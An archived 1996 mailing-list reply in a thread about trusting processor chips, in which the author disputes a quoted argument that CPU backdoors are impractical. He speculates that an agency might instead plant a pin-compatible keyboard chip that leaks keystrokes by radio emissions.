[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: trusting the processor chip



At 01:53 PM 4/25/96 -0400, Jeffrey C. Flynn wrote:

>I received several responses to this question.  My favorite was as follows...
>
>>This is probably science fiction, particularly at the VHDL level.
>>Maybe someone could make a crime of opportunity out of a microcode
>>flaw, but there's a risk of it being found out during testing.
>>
>>To do it right would require collusion of the design and test teams.
>>They need to ensure the back door stays closed, isn't tickled by
>>"normal" testing and only opens when really requested. So a lot of
>>people are in on the secret even before it gets exploited for
>>nefarious purposes.
>>
>>And what nefarious purposes would pay for the risks and costs of this?
>>If the secret got out, the design team, product line, and company
>>would be dead in the marketplace and probably spend the rest of their
>>lives responding to lawsuits. What could you use this for that is
>>worth the risk?

This analysis seems to assume that the entire production run of a standard 
product is subverted.  More likely,I think, an organization like the NSA 
might build a pin-compatible version of an existing, commonly-used product 
like a keyboard encoder chip that is designed to transmit (by RFI signals) 
the contents of what is typed at the keyboard.  It's simple, it's hard to 
detect, and it gets what they want.

Jim Bell
[email protected]